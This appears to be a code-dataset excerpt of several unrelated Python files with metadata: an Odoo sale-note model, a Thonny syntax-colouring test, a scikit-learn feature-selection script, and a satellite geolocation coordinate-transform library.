\"{'default_res_model': '%s','default_res_id': %d}\" % (self._name, res_id)\r\n }\r\n\r\n @api.model\r\n def create(self, vals):\r\n abbr=None\r\n sequence_dict={}\r\n partner=self.env['res.partner'].browse(vals['partner_id'])\r\n abbr=partner.partner_abbr\r\n\r\n if not abbr or abbr==\"\":\r\n raise exceptions.Warning(_('Cliente %s no tiene Abreviatura. Ingrese abreviatura en Cliente') %(partner.name,))\r\n\r\n sequence_dict=self.env['res.config.settings'].sudo().get_values()\r\n sequence_id=sequence_dict['project_sequence']\r\n \r\n _logger.info(\"secuence=%s\",sequence_dict)\r\n if not sequence_id:\r\n raise exceptions.Warning(_('Sequencia no esta configurada. Por favor, contactese con el Administrador de sistema'))\r\n\r\n sequence_id=sequence_dict['project_sequence']\r\n vals['sale_note_number'] = self.env['ir.sequence'].sudo().next_by_code('project_sale_order')\r\n vals['sale_note_reference']=vals.get('sale_note_number').replace(\"ABR\",abbr)\r\n\r\n res=super(crm_sale_note, self).create(vals)\r\n return res\r\n\r\n @api.multi\r\n def write(self,vals):\r\n #create project_reference if project_reference not set\r\n if (not self.sale_note_reference or self.sale_note_reference=='Ref. No Disponible') and (self.partner_id or 'partner_id' in vals):\r\n abbr=None\r\n sequence_dict={}\r\n if not vals.get('partner_id',False):\r\n partner=self.env['res.partner'].browse(self.partner_id.id)\r\n abbr=partner.partner_abbr\r\n else:\r\n partner=self.env['res.partner'].browse(vals['partner_id'])\r\n abbr=partner.partner_abbr\r\n\r\n if not abbr or abbr==\"\":\r\n raise exceptions.Warning(_('Cliente %s no tiene Abreviatura. Ingrese abreviatura en Cliente') %(partner.name,))\r\n\r\n sequence_dict=self.env['res.config.settings'].sudo().get_values()\r\n sequence_id=sequence_dict['project_sequence']\r\n\r\n if not sequence_id:\r\n raise exceptions.Warning(_('Sequencia no esta configurada. Por favor, contactese con el Administrador de sistema'))\r\n\r\n sequence_id=sequence_dict['project_sequence']\r\n vals['sale_note_number'] = self.env['ir.sequence'].next_by_code('project_sale_order')\r\n vals['sale_note_reference']=vals.get('project_number',False).replace(\"ABR\",abbr)\r\n\r\n res=super(crm_sale_note, self).write(vals)\r\n return res","sub_path":"apiux_project/models/sale_note.py","file_name":"sale_note.py","file_ext":"py","file_size_in_byte":9777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"438452144","text":"import tkinter\n\nfrom thonny.plugins.coloring import SyntaxColorer\nimport tkinter.font as tk_font\n\n\nTEST_STR1 = \"\"\"def my_function():\n str1 = \"aslas'\"\n str2 = 'asdasd\"asda\n str3 = '''asdasdasd\n asdas\n sdsds'''\n\"\"\"\n\nOPEN_TAG_NAME = \"STRING_OPEN\"\nCLOSED_TAG_NAME = \"STRING_CLOSED\"\n\n\ndef test_open_closed_strings():\n\n text_widget = tkinter.Text()\n text_widget.insert(\"insert\", TEST_STR1)\n\n font = tk_font.nametofont(\"TkDefaultFont\")\n colorer = SyntaxColorer(text_widget, font, font)\n colorer.recolorize()\n\n open_ranges = text_widget.tag_ranges(OPEN_TAG_NAME)\n closed_ranges = text_widget.tag_ranges(CLOSED_TAG_NAME)\n\n expected_open_ranges = {('3.11', '4.0'), }\n expected_closed_ranges = {('2.11', '2.19'), ('4.11', '6.12'), }\n\n open_ranges_set = set([(str(open_ranges[i]), str(open_ranges[i+1])) for i in range(0, len(open_ranges), 2)])\n closed_ranges_set = set([(str(closed_ranges[i]), str(closed_ranges[i+1])) for i in range(0, len(closed_ranges), 2)])\n\n assert open_ranges_set == expected_open_ranges\n assert closed_ranges_set == expected_closed_ranges\n print(\"test passed\")\n\n\ndef run_tests():\n test_open_closed_strings()\n\nif __name__ == \"__main__\":\n print(\"Test input: \")\n print(TEST_STR1)\n run_tests()\n","sub_path":"tests/plugin_tests/coloring_tests.py","file_name":"coloring_tests.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"180171500","text":"# This code uses feature selection algorithms with differente models\n# to obtain the most important features of our data\n# Algorithms used are stability selection, rfe and rfecv\n\n# Import relevant packages\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_selection import RFE, RFECV\nfrom sklearn.linear_model import LogisticRegression, Lasso, LinearRegression, RandomizedLasso, RandomizedLogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import tree\nfrom sklearn.model_selection import StratifiedKFold\nimport numpy as np\n\n\n# Read file\n# When doing transportation comment out line 25\n# df = pd.read_csv('transportationet.csv', index_col='Unnamed: 0')\n# When doing data_greater_than_20 uncomment line 25\ndf = pd.read_csv('data_greater_than_20.csv', index_col='Unnamed: 0')\n#df = pd.read_csv('~/Downloads/network_classification/src/data/data_greater_than_20.csv', index_col='Unnamed: 0')\n\n# # Delete categorical column\ndel df['Graph']\n\n\n# Change the collection names to numbers\ndf['Collection'] = df['Collection'].astype('category')\ndf['Collection'] = df['Collection'].cat.codes\n\n# Get all column names\ncol_names = df.keys()\n\n# Create array of the values and define X and Y\ndf_array = df.values\nX = df_array[:, 1:15]\nY = df_array[:, 0] #target variable (collection)\n\n# Number of important features we want to extract\n# Using 1 will give us the ranking of all of the features\nnum_of_features = 1\n\n\n\n#**************************************\n# RFE feature selection function\n#**************************************\n\n# Define function that runs RFE in different models\ndef rfe_function(model, model_name, num_of_features, X, Y):\n rfe = RFE(model, num_of_features)\n fit = rfe.fit(X,Y)\n print(\"\\n\" + model_name)\n print(\"Num Features: \" + str(fit.n_features_))\n print(\"Selected Features: \" + str(fit.support_))\n print(\"Feature Ranking: \" + str(fit.ranking_))\n # Print the most important feature\n print(\"\\nMost Important Feature in \" + model_name + \": \")\n for i, val in enumerate(fit.ranking_):\n if val == True:\n print(col_names[i+1])\n\n\n# Calling function to run RFE with different models\nrfe_function(LogisticRegression(), \"Logistic Regression\", num_of_features, X, Y)\nrfe_function(Lasso(alpha = 0.1), \"Lasso Regression\", num_of_features, X, Y)\nrfe_function(LinearSVC(), \"Linear SVC\", num_of_features, X, Y)\nrfe_function(LinearRegression(), \"Linear Regression\", num_of_features, X, Y)\nrfe_function(tree.DecisionTreeClassifier(random_state=42), \"Decision Tree\", num_of_features, X, Y)\nrfe_function(RandomForestClassifier(random_state=42), \"Random Forest\", num_of_features, X, Y)\n\n\n\n# *******************************************\n# Stability Selection Method\n# *******************************************\n\ndef stability_select(model, model_name, X, Y):\n model.fit(X,Y)\n print(model_name)\n print(\"Features sorted by their score:\")\n print(sorted(zip(map(lambda x: round(x, 4), model.scores_), col_names), reverse=True))\n\n\nstability_select(RandomizedLasso(alpha=0.01), \"\\nRandomized Lasso Regression\", X, Y)\nstability_select(RandomizedLogisticRegression(), \"\\nRandomized Logistic Regression\", X, Y)\n\n#**************************************\n# RFECV feature selection\n#**************************************\nlist = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ndf_features = pd.DataFrame(index=pd.Series(range(14)))\niterations = 100\ntotal_num_features = 14\n\ndef rfecv(model, name):\n for j in range(iterations):\n rfecv = RFECV(estimator=model, step=1, cv=StratifiedKFold(n_splits=5, shuffle=False),\n scoring='accuracy')\n\n rfecv.fit(X, Y)\n # Uncomment this to see the ranking of the features in rfecv\n print(\"Optimal number of features : %d\" % rfecv.n_features_)\n print(\"Selected Features: \" + str(rfecv.support_))\n print(\"Feature Ranking: \" + str(rfecv.ranking_))\n\n # Get grid scores\n g_scores = rfecv.grid_scores_\n indices = np.argsort(g_scores)[::-1]\n print('Printing RFECV results:')\n\n for f in range(X.shape[1]):\n # print(\"%d. Number of features: %d, Grid_Score: %f\" % (f + 1, indices[f] + 1, g_scores[indices[f]]))\n for i in range(total_num_features):\n if indices[f] == i :\n list[i] = list[i] + g_scores[indices[f]]\n print('List: ' + str(list))\n\n df_features['scores'] = list\n print(df_features.columns)\n\n\n for m in range(total_num_features):\n list[m] = list[m]/iterations\n\n print('New List: ' + str(list))\n\n\n\n # Plot number of features VS. cross-validation scores\n plt.figure()\n plt.title(name, {'size': '22'})\n plt.xlabel(\"Number of features selected\", {'size': '18'})\n plt.ylabel(\"Cross validation score \\n(nb of correct classifications)\", {'size': '18'})\n plt.plot(range(1, len(list) + 1), list)\n plt.show()\n\n return list\n\n\n\n# Calling RFECV function for all three models\nrfecv(LinearSVC(), \"RFECV - Linear SVC\")\nrfecv(tree.DecisionTreeClassifier(), \"RFECV - Decision Tree\")\nrfecv(RandomForestClassifier(), \"RFECV - Random Forest\")\n\n\n# Used to save rfecv data\n# Change file or path name as desired\nlist = pd.DataFrame(list)\nlist.to_csv('rfecv_random_tree_data.csv')\n#list.to_csv('~/Downloads/network_classification/src/data/rfecv_random_tree_data.csv')\n","sub_path":"foodandtransportation/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"468601487","text":"# -*- coding: utf-8 -*-\n# geolocation.py\n\n# Copyright (c) 2015-2018, Likun Wang (Likun.Wang@noaa.gov)\n# Copyright (c) 2015-2018, Earth System Science Interdisciplinary \n# Center/Univ. of Maryland \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holders nor the names of any\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\" Accurate and fast geolocaiton coordinate transformation.\n\nA collection of functions to handle geolocaiton coordinate transformation. \nBasically, it follows the same functions from ADL common geolocation library \nby calling the same library and using the same parameters for accuracy \nconsideration. In addition, to achieve the fast calculations, some functions \nare vectorized. \n\n:Author:\n `Likun Wang `_\n\n:Organization:\n Earth System Science Interdisciplinary Center/Univ. of Maryland \n\n:Version: 2018.9.5\n\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nfrom numpy import sqrt, sin, cos, tan, deg2rad, \\\n arctan2, arctan, arcsin, rad2deg, arccos \nfrom numpy import arcsin as asin\nfrom numpy import arctan2 as atan2\n\nfrom datetime import datetime, timedelta\nfrom functools import partial\nfrom itertools import izip\n\nimport pyproj\nfrom novas.compat import cel2ter, ter2cel\n\nfrom astropy.time import Time, TimeDelta\nfrom astropy.utils import iers\nfrom pykdtree.kdtree import KDTree\n\nfrom jpss import cris_sensor_info\n\nimport time\n\nWGS84_A = 6378137.0\nWGS84_F = 1.0 / 298.257223563\nWGS84_B = WGS84_A*(1.0 - WGS84_F)\nWGS84_E2 = 2 * WGS84_F - WGS84_F ** 2\n\neq_rad_km=6.37813700000000e+3; #/* equatorial radius, KM */\neq_radm=6.37813700000000e+6; #/* equatorial radius, meters */\npole_radm=6.35675231424518e+6; #/* polar_radius, meters */\neccen_sqr=6.69437999014132e-3; #/* e^2 = f(2 - f) */\ndetic2centric=9.93305620009859e-1; #/* 1 - e^2 */\ncentric2detic=1.00673949674228e+0; #/* 1 / (1 - e^2) */\ndelta=6.73949674227643e-3; #/* ( 1/(1-f)^2 ) - 1 */\n\n#Rotational angular velocity of Earth in radians/sec from IERS\n# Conventions (2003).\nANGVEL = 7.2921150e-5;\n\n# Polar Wonder data\n#iers.conf.auto_download = False\ndat = iers.IERS_Auto.open()\n\n# NPP/CrIS parameters \npara = cris_sensor_info()\n\n\n#####################################################################################\ndef rotationMatrixY(thePitch): \n\n \"\"\"\n Compute rotation matrix around Y axis\n \"\"\"\n thePitch = np.asarray(thePitch, dtype=np.float64)\n \n pitchMatrix = np.zeros((thePitch.size, 3, 3), dtype=np.float64)\n pitchMatrix[:, 0,0] = cos(thePitch)\n pitchMatrix[:, 0,1] = 0\n pitchMatrix[:, 0,2] = sin(thePitch)\n\n pitchMatrix[:, 1,0] = 0\n pitchMatrix[:, 1,1] = 1\n pitchMatrix[:, 1,2] = 0\n\n pitchMatrix[:, 2,0] = -sin(thePitch)\n pitchMatrix[:, 2,1] = 0\n pitchMatrix[:, 2,2] = cos(thePitch)\n \n return np.squeeze(pitchMatrix)\n \ndef rotationMatrixX(theRoll):\n\n \"\"\"\n Compute rotation matrix around X axis\n \"\"\" \n theRoll = np.asarray(theRoll, dtype=np.float64)\n \n rollMatrix = np.zeros((theRoll.size, 3, 3), dtype=np.float64)\n\n rollMatrix[:, 0,0] = 1;\n rollMatrix[:, 0,1] = 0;\n rollMatrix[:, 0,2] = 0;\n\n rollMatrix[:, 1,0] = 0;\n rollMatrix[:, 1,1] = cos(theRoll);\n rollMatrix[:, 1,2] = -sin(theRoll);\n\n rollMatrix[:, 2,0] = 0;\n rollMatrix[:, 2,1] = sin(theRoll);\n rollMatrix[:, 2,2] = cos(theRoll);\n\n return np.squeeze(rollMatrix)\n\ndef rotationMatrixZ(theYaw): \n\n \"\"\"\n Compute rotation matrix around Z axis\n \"\"\" \n theYaw = np.asarray(theYaw, dtype=np.float64)\n\n yawMatrix = np.zeros((theYaw.size, 3, 3), dtype=np.float64)\n \n yawMatrix[:, 0,0] = cos(theYaw)\n yawMatrix[:, 0,1] = -sin(theYaw)\n yawMatrix[:, 0,2] = 0\n\n yawMatrix[:, 1,0] = sin(theYaw)\n yawMatrix[:, 1,1] = cos(theYaw)\n yawMatrix[:, 1,2] = 0\n\n yawMatrix[:, 2,0] = 0\n yawMatrix[:, 2,1] = 0\n yawMatrix[:, 2,2] = 1\n\n return np.squeeze(yawMatrix);\n\n\ndef dot_product(v, w):\n \"\"\"\n Dot product of two vectors\n \"\"\"\n return np.einsum('...j,...j->...', v, w)\n\ndef matrix_matrix_product(A, B):\n \"\"\"\n Product of two matrix\n \"\"\"\n return np.einsum('...jk,...kl->...jl', A, B)\n \ndef matrix_vector_product(M, v):\n \"\"\"\n Product of matrix with vector\n \"\"\"\n return np.einsum('...jk,...k->...j', M, v) \n\ndef normalize_vector(v): \n \"\"\"\n Unit vector of the vectors\n \"\"\"\n v = np.asarray(v, dtype=np.float64) \n mag = np.sqrt(np.einsum('...i,...i', v, v))\n if mag.size ==1: return v/mag\n else: return v/np.expand_dims(mag, axis=-1) \n\ndef mag_vector(v): \n \"\"\"\n the magnitude of the vectors\n \"\"\"\n v = np.asarray(v, dtype=np.float64) \n mag = np.sqrt(np.einsum('...i,...i', v, v))\n return mag\n \ndef findAnglesBetweenTwoVectors(v1s, v2s):\n \"\"\"\n the angle of the two vectors\n \"\"\"\n v1s = np.asarray(v1s, dtype=np.float64)\n v2s = np.asarray(v2s, dtype=np.float64)\n\n dot_v1_v2 = dot_product(v1s, v2s)\n dot_v1_v1 = dot_product(v1s, v1s)\n dot_v2_v2 = dot_product(v2s, v2s)\n return np.rad2deg(np.arccos(dot_v1_v2/(np.sqrt(dot_v1_v1)*np.sqrt(dot_v2_v2))))\n \ndef Triad (v1, v2, r1, r2): \n \"\"\"\n Derive transformation matrix from two vectors. The ideas are from\n https://en.wikipedia.org/wiki/Triad_method\n \n INPUTS: R = A V\n A is Transformation matrix [3,3]\n V1, V2: the two vector in reference coordinates\n R1, R2: the two vector in transfomed coordinates\n \"\"\" \n vv1 = normalize_vector(v1)\n vv2 = normalize_vector(v2)\n vv3 = normalize_vector(np.cross(v1, v2))\n vv4 = np.cross(vv1, vv3)\n \n rr1 = normalize_vector(r1)\n rr2 = normalize_vector(r2)\n rr3 = normalize_vector(np.cross(r1, r2))\n rr4 = np.cross(rr1, rr3)\n \n a1 = np.column_stack((vv1, vv3, vv4))\n a2 = np.column_stack((rr1, rr3, rr4))\n a = matrix_matrix_product(a2, a1.T)\n \n return a\n \n \ndef compute_alpha_beta(v, degree=False): \n\n \"\"\"\n Convert three-variable vector into two-variable degree for \n perturbation purpose. \n \"\"\"\n\n v = np.asarray(v, dtype=np.float64)\n \n if v.ndim == 1: v = np.expand_dims(v, axis=0)\n if v.ndim >= 2: \n sz = v.shape\n v = v.reshape(-1, 3)\n \n alpha = atan2(v[:, 0], v[:, 2])\n beta = atan2(v[:, 1], v[:, 2])\n \n if degree: alpha, beta = rad2deg(alpha), rad2deg(beta)\n \n return alpha.reshape(sz[:-1]), beta.reshape(sz[:-1])\n \n \ndef haversine(lon1, lat1, lon2, lat2, R=None):\n \"\"\"\n Calculate the great circle distance between two points\n on the earth (specified in decimal degrees)\n \"\"\"\n \n if R is None: R=6367.0\n \n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(deg2rad, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * arcsin(sqrt(a))\n km = R * c\n return km\n \ndef rotate_vec (rotationAxis, angle, oldVector, degree=True): \n\n rotationAxis = np.asarray(rotationAxis, dtype=np.float64)\n angle = np.asarray(angle, dtype=np.float64)\n oldVector = np.asarray(oldVector, dtype=np.float64)\n \n ## check vector size \n if rotationAxis.size != oldVector.size: \n print ('The vector size does not match')\n return\n \n if rotationAxis.ndim == 1: \n rotationAxis=np.expand_dims(rotationAxis, axis=0)\n \n if oldVector.ndim == 1: \n oldVector=np.expand_dims(oldVector, axis=0) \n \n if angle.size != 1: \n print('check angle input')\n return \n \n ## we need to normalize rotationAxis \n mag = np.linalg.norm(rotationAxis, axis=1)\n rotationAxis= rotationAxis/np.expand_dims(mag, axis=1)\n\n ## check angle unit \n if degree: angle = np.deg2rad(angle)\n \n cosAngle = cos(angle) ;\n sinAngle = sin(angle) ;\n\n ## 1st term\n firstTerm = oldVector * cosAngle ;\n \n ## 2nd term\n secondTerm = np.cross(oldVector, rotationAxis) * sinAngle \n \n ## 3rd term \n temp= np.einsum('ij,ij->i', oldVector, rotationAxis)\n temp= np.expand_dims(temp, axis=1)\n thirdTerm = (temp * rotationAxis) * ( 1.0 - cosAngle) ;\n newVector = firstTerm - secondTerm + thirdTerm ;\n \n return newVector \n\ndef find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return idx\n \ndef reject_outliers(data, m=2):\n return data[abs(data - np.mean(data)) < m * np.std(data)] \n \n##################################################################################### \ndef buildFovLosInSSMF(FlipFOV=False): \n\n \n ## from SBF_To_IAR\n MatrixP = rotationMatrixY (para['SBFtoIAR_pitch']*1e-6)\n MatrixR = rotationMatrixX (para['SBFtoIAR_roll']*1e-6)\n MatrixY = rotationMatrixZ (para['SBFtoIAR_yaw']*1e-6)\n Mat_SBFtoIAR = matrix_matrix_product(MatrixR, MatrixP)\n Mat_SBFtoIAR = matrix_matrix_product(Mat_SBFtoIAR, MatrixY)\n\n ## from IAR_To_SSMR\n MatrixP = rotationMatrixY (para['IARtoSSMR_pitch']*1e-6)\n MatrixR = rotationMatrixX (para['IARtoSSMR_roll']*1e-6)\n MatrixY = rotationMatrixZ (para['IARtoSSMR_yaw']*1e-6)\n Mat_IARtoSSMR = matrix_matrix_product(MatrixR, MatrixP)\n Mat_IARtoSSMR = matrix_matrix_product(Mat_IARtoSSMR, MatrixY)\n\n ## from SSMR_To_SSMF\n MatrixP = rotationMatrixY (para['SSMRtoSSMF_pitch']*1e-6)\n MatrixR = rotationMatrixX (para['SSMRtoSSMF_roll']*1e-6)\n MatrixY = rotationMatrixZ (para['SSMRtoSSMF_yaw']*1e-6)\n Mat_SSMRtoSSMF = matrix_matrix_product(MatrixR, MatrixP)\n Mat_SSMRtoSSMF = matrix_matrix_product(Mat_SSMRtoSSMF, MatrixY)\n\n Mat_SBFtoSSMF = matrix_matrix_product(matrix_matrix_product(Mat_SBFtoIAR, Mat_IARtoSSMR), Mat_SSMRtoSSMF)\n\n ## nominal optical axis direction\n opticalAxis = np.array([1.0, 0, 0], dtype=np.float64)\n\n LW_FOV5_inTrk = para['lw_losRelativePitch'] \n LW_FOV5_crTrk = para['lw_losRelativeYaw'] \n\n fov_inTrackAngle = np.asarray(para['lw_intrackOffsetAngle'], dtype=np.float64)\n fov_crTrackAngle = np.asarray(para['lw_crosstrackOffsetAngle'], dtype=np.float64)\n\n losInIOAR = np.zeros((fov_inTrackAngle.size, 3))\n losInSSMF = np.zeros((fov_inTrackAngle.size, 3))\n\n for i in range(0, fov_inTrackAngle.size):\n\n ifov = i \n if FlipFOV: \n if i==0: ifov = 2\n if i==2: ifov = 0\n if i==3: ifov = 5\n if i==5: ifov = 3\n if i==6: ifov = 8\n if i==8: ifov = 6\n \n fovYaw = -1.0*(fov_crTrackAngle[ifov] + LW_FOV5_crTrk)*1.0e-6\n fovPitch = (fov_inTrackAngle[ifov] + LW_FOV5_inTrk)*1.0e-6\n \n losInIOAR[i, :] = matrix_vector_product(rotationMatrixZ(fovYaw), opticalAxis)\n losInIOAR[i, :] = matrix_vector_product(rotationMatrixY(fovPitch), losInIOAR[i, :]) \n \n # Apply IOAR-SSMF transformation to account for pitch and yaw \n # misalignments between interferometer and scan mechanism\n losInSSMF[i, :] = matrix_vector_product(rotationMatrixZ(para['IFRboresighttoSSMF_yaw']*1e-6) , losInIOAR[i, :])\n losInSSMF[i, :] = matrix_vector_product(rotationMatrixY(para['IFRboresighttoSSMF_pitch']*1e-6), losInSSMF[i, :])\n \n return losInSSMF, Mat_SBFtoSSMF\n \n##################################################################################### \ndef buildMatSCToSBF (): \n \n ## from SC_To_SBF\n MatrixP = rotationMatrixY (para['SCtoSBF_pitch']*1e-6)\n MatrixR = rotationMatrixX (para['SCtoSBF_roll']*1e-6)\n MatrixY = rotationMatrixZ (para['SCtoSBF_yaw']*1e-6)\n Mat_SCtoSBF = matrix_matrix_product(MatrixR, MatrixP)\n Mat_SCtoSBF = matrix_matrix_product(Mat_SCtoSBF, MatrixY)\n return Mat_SCtoSBF\n\n##################################################################################### \n\ndef buildLosInSBF(forIET, servoErrCrTrk=None, servoErrInTrk=None):\n\n forIET = np.asarray(forIET)\n\n nScan, nFor = forIET.shape \n nFov = 9\n \n losInSSMF, Mat_SBFtoSSMF = buildFovLosInSSMF() \n\n ## unit vector of RMF \n normalRMF = np.array([-1.0, 0, 1.0], dtype=np.float64)/sqrt(2.0)\n \n commandedCrTrk = np.asarray(para['actualCrosstrackAngle'], dtype=np.float64)\n commandedInTrk = np.asarray(para['actualIntrackAngle'], dtype=np.float64)\n \n commandedCrTrk = np.broadcast_to(commandedCrTrk, (nScan, nFor))\n commandedInTrk = np.broadcast_to(commandedInTrk, (nScan, nFor))\n \n if servoErrCrTrk is None and servoErrInTrk is None: \n commandedCrTrk = commandedCrTrk*1e-6\n commandedInTrk = commandedInTrk*1e-6\n else: \n commandedCrTrk = (commandedCrTrk + servoErrCrTrk)*1e-6\n commandedInTrk = (commandedInTrk + servoErrInTrk)*1e-6\n \n ## adding FOV elements \n commandedCrTrk = np.broadcast_to(commandedCrTrk, (nFov, nScan, nFor))\n commandedInTrk = np.broadcast_to(commandedInTrk, (nFov, nScan, nFor))\n \n commandedCrTrk = np.transpose(commandedCrTrk, (1, 2, 0))\n commandedInTrk = np.transpose(commandedInTrk, (1, 2, 0))\n \n \n commandedCrTrk = commandedCrTrk.reshape(nScan*nFor*nFov)\n commandedInTrk = commandedInTrk.reshape(nScan*nFor*nFov)\n \n ## Compute Normal of SSMF \n normalSSMF = matrix_vector_product(rotationMatrixX(commandedCrTrk), normalRMF)\n normalSSMF = matrix_vector_product(rotationMatrixY(commandedInTrk), normalSSMF)\n \n ## get FOV LOS in SSMF \n losInSSMF, Mat_SBFtoSSMF = buildFovLosInSSMF()\n \n losInSSMF = np.broadcast_to(losInSSMF, (nScan, nFor, nFov, 3))\n losInSSMF = losInSSMF.reshape((nScan*nFor*nFov, 3))\n \n \n dotProdAns = dot_product(losInSSMF, normalSSMF) \n dotProdAns = dotProdAns.reshape(-1, 1) * normalSSMF\n \n losInSBF = matrix_vector_product(Mat_SBFtoSSMF, losInSSMF - 2*dotProdAns) \n \n losInSBF = losInSBF.reshape(nScan, nFor, nFov, 3)\n \n return losInSBF\n\n \n##################################################################################### \ndef buildQuatMatrix(Qw, Qi, Qj, Qk): \n \"\"\"\n //-------------------------------------------------------------------\n // See the book edited by James R. Wertz, Library of Congress CIP Data:\n // Computer Science Corporation. Attitude Systems Operation.\n // Spacecraft Attitude Determination and Control.\n // (Astrophysics and space library ; v. 73)\n // 'Contract no. NAS 5-11999.'\n // TL3260.C65 1978 629.47'42 78-23657\n // ISBN 90-277-0959-9\n // ISBN 90-277-1204-2 (pbk.)\n // Published by D. Reidel Publishing Company. Copyright 1978.\n // Last reprinted 1997. Appendix E, particullarly Page 762, E-8.\n // See also: http://mathworld.wolfram.com/EulerAngles.html\n //\n // The spacecraft attitude quaternions provide the rotation from J2000 ECI\n // coordinates to spacecraft coordinates.\n \n \"\"\"\n \n qMat2eci = np.zeros((Qw.size, 3, 3))\n \n #If the sum of squares is 1, then the quaternion is already normalized.\n mag = sqrt(Qi*Qi + Qj*Qj + Qk*Qk + Qw*Qw);\n \n Qw /= mag;\n Qi /= mag;\n Qj /= mag;\n Qk /= mag;\n\n # first row of the matrix\n qMat2eci[:, 0, 0] = (Qi*Qi) - (Qj*Qj) - (Qk*Qk) + (Qw*Qw);\n qMat2eci[:, 0, 1] = 2.e0*( (Qi*Qj) + (Qk*Qw) );\n qMat2eci[:, 0, 2] = 2.e0*( (Qi*Qk) - (Qj*Qw) );\n\n # second row of the matrix\n qMat2eci[:, 1, 0] = 2.e0*( (Qi*Qj) - (Qk*Qw) );\n qMat2eci[:, 1, 1] = -(Qi*Qi) + (Qj*Qj) - (Qk*Qk) + (Qw*Qw);\n qMat2eci[:, 1, 2] = 2.e0*( (Qj*Qk) + (Qi*Qw) );\n\n # third row of the matrix\n qMat2eci[:, 2, 0] = 2.e0*( (Qi*Qk) + (Qj*Qw) );\n qMat2eci[:, 2, 1] = 2.e0*( (Qj*Qk) - (Qi*Qw) );\n qMat2eci[:, 2, 2] = -(Qi*Qi) - (Qj*Qj) + (Qk*Qk) + (Qw*Qw);\n\n ## Return the spacecraft coordinates from J2000 ECI to SC matrix.\n Mat_SCtoECI = qMat2eci.squeeze()\n return Mat_SCtoECI\n \n#####################################################################################\ndef LLA2ECEF(lonIn, latIn, altIn):\n \"\"\"\n Transform lon,lat,alt (WGS84 degrees, meters) to ECEF\n x,y,z (meters)\n \"\"\"\n lonRad = deg2rad(np.asarray(lonIn, dtype=np.float64) ) \n latRad = deg2rad(np.asarray(latIn, dtype=np.float64) )\n alt = np.asarray(altIn, dtype=np.float64) \n a, b, e2 = WGS84_A, WGS84_B, WGS84_E2\n\n ## N = Radius of Curvature (meters), defined as:\n N = a/sqrt(1.0-e2*(sin(latRad)**2.0))\n \n ##$ calcute X, Y, Z\n x=(N+alt)*cos(latRad)*cos(lonRad)\n y=(N+alt)*cos(latRad)*sin(lonRad)\n z=(b**2.0/a**2.0*N + altIn)*sin(latRad)\n\n return x, y, z \n\n\ndef RAE2ENU(azimuthIn, zenithIn, rangeIn):\n \"\"\"\n Transform azimuth, zenith, range to ENU x,y,z (meters)\n \"\"\"\n azimuth = deg2rad(np.asarray(azimuthIn, dtype=np.float64))\n zenith = deg2rad(np.asarray(zenithIn, dtype=np.float64))\n r = np.asarray(rangeIn, dtype=np.float64)\n\n # up \n up = r*cos(zenith)\n \n # projection on the x-y plane \n p = r*sin(zenith) \n \n # north \n north = p*cos(azimuth)\n \n # east\n east = p*sin(azimuth) \n\n return east, north, up\n\n \ndef ENU2RAE(east, north, up):\n \"\"\"\n Transform ENU x,y,z (meters) to azimuth angle, zenith angle, and range \n \"\"\"\n\n p = sqrt(east**2 + north**2 + up**2)\n \n zenith = rad2deg(arccos(up/p))\n azimuth = rad2deg(arctan2(east, north))\n \n return p, azimuth, zenith\n \n \n \n#####################################################################################\ndef ENU2ECEF (east, north, up, lon, dlat):\n \"\"\"\n Convert local East, North, Up (ENU) coordinates to the (x,y,z) Earth Centred Earth Fixed (ECEF) coordinates\n Reference is here: \n http://www.navipedia.net/index.php/Transformations_between_ECEF_and_ENU_coordinates\n Note that laitutde should be geocentric latitude instead of geodetic latitude \n Note: \n\n On June 16 2015\n This note from https://en.wikipedia.org/wiki/Geodetic_datum \n Note: \\ \\phi is the geodetic latitude. A prior version of this page showed use of the geocentric latitude (\\ \\phi^\\prime).\n The geocentric latitude is not the appropriate up direction for the local tangent plane. If the\n original geodetic latitude is available it should be used, otherwise, the relationship between geodetic and geocentric\n latitude has an altitude dependency, and is captured by ...\n \"\"\" 